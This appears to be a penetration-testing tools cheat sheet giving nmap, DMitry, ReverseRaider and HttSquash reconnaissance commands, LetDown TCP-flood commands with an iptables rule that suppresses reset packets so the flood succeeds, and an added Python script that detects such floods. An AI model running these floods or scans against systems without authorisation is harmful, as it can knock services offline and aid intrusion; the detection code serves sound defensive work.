Network Mapping

Service Fingerprinting

nmap
Version Detection (fast scan: -F limits the scan to the 100 most common ports)
#nmap -A -T4 -F 192.168.10.10

Complex Version Detection (default port range)
#nmap -A -T4 192.168.10.10

DMitry - Deepmagic Information Gathering Tool

dmitry -w example-host.com
This will perform a named whois (INIC-WHOIS) lookup on the target host, displaying results to the standard output (STDOUT).

dmitry -winsepo sometextfile.txt example-host.com
This will perform all the basic functions on the target host and store all the output into "sometextfile.txt".

dmitry -winsepo example-host.com
This will perform all the basic functions on the target host and store all the output into "example-host.com.txt".

dmitry -winsepfbo 127.0.0.1
This will perform all the basic functions on the target host and store all the output into "127.0.0.1.txt". This will also display banners and show filtered ports.

LetDown
LetDown is a TCP flooder. It has an (experimental) userland TCP/IP stack, packet fragmentation and a variable TCP window. From version 0.7 it supports multistage payloads for complex protocols such as FTP, SMTP, etc.

The basic idea is to first firewall your source address to prevent your own OS from interfering with your attack. Next you create hundreds or thousands of connections to the TCP port you are targeting.

Let's see some simple uses of the tool...

Remember: the kernel will reset the connections if you don't set your firewall properly (the userland stack opens connections the kernel knows nothing about, so it answers with RST). For iptables you can drop the outgoing RST-only packets with:

# iptables -A OUTPUT -p tcp --tcp-flags ALL RST -j DROP

Examples:

A generic 3-way handshake flooding against a service (in this case FTP):
# letdown -d 208.11.11.11 -s 192.168.1.9 -p 21

Attack against a webserver using payload and firewall options:
# letdown -d 208.11.11.11 -s 192.168.1.9 -p 80 -f iptables -P payloads/http.txt

An attack that uses only 3 source ports (120-123), together with the time option:
# letdown -d 208.11.11.11 -s 192.168.1.9 -p 80 -x 120 -y 123 -t 10000

For an advanced tutorial, see the complemento howto.
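From the defender's side, the pattern described above (hundreds of connections from one source address to one target port, sometimes from a tiny range of source ports) stands out in a connection table. The following is an added example, not code from the page or from the LetDown project; it parses a constructed, simplified connection table rather than real ss or netstat output.

```python
"""Detect the connection-flood pattern LetDown produces (many TCP
connections from one source address to one target port).
Added example, not part of the original page; the input is a constructed
simplified table, not real ss/netstat output."""
from collections import defaultdict

# Constructed sample: one line per connection, "src_ip:src_port dst_ip:dst_port state".
# The 192.168.1.9 -> :80 lines mimic a flood driven from source ports 120-123;
# the remaining lines are ordinary traffic.
SAMPLE_TABLE = "\n".join(
    [f"192.168.1.9:{120 + i % 4} 208.11.11.11:80 SYN_RECV" for i in range(12)]
    + [
        "10.0.0.5:51234 208.11.11.11:80 ESTABLISHED",
        "10.0.0.6:51235 208.11.11.11:443 ESTABLISHED",
        "10.0.0.5:51236 208.11.11.11:80 TIME_WAIT",
    ]
)


def parse_table(text):
    """Return (src_ip, src_port, dst_port, state) tuples; skip malformed lines."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3 or ":" not in parts[0] or ":" not in parts[1]:
            continue
        src_ip, src_port = parts[0].rsplit(":", 1)
        _, dst_port = parts[1].rsplit(":", 1)
        if not (src_port.isdigit() and dst_port.isdigit()):
            continue
        rows.append((src_ip, int(src_port), int(dst_port), parts[2]))
    return rows


def find_floods(rows, threshold=10):
    """Group connections by (src_ip, dst_port) and flag groups at or above
    threshold. The distinct source-port count is reported too: many
    connections from very few source ports (LetDown's -x/-y range) is a
    stronger signal than the same count spread over ephemeral ports."""
    groups = defaultdict(list)
    for src_ip, src_port, dst_port, _state in rows:
        groups[(src_ip, dst_port)].append(src_port)
    return {
        key: {"connections": len(ports), "source_ports": len(set(ports))}
        for key, ports in groups.items()
        if len(ports) >= threshold
    }


if __name__ == "__main__":
    for (src, port), info in find_floods(parse_table(SAMPLE_TABLE)).items():
        print(f"{src} -> :{port}: {info['connections']} connections "
              f"from {info['source_ports']} source ports")
```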

ReverseRaider

ReverseRaider is a domain scanner that uses brute-force wordlist scanning to find a target's subdomains, or reverse resolution of an IP range. It supports wordlist permutation, IPv6 and some DNS options.

Reverse scanning of an IP range
reverseraider -r 66.249.93.100-120

Wordlist scanning of a domain
reverseraider -d google.com -w wordlists/fast.list


HttSquash
Httsquash is an HTTP server scanner, banner grabber and data retriever. It can be used to scan large IP ranges to find devices or HTTP servers. It supports IPv6, custom requests and basic fingerprinting of remote servers.
httsquash -r 89.97.126.0-10 -T head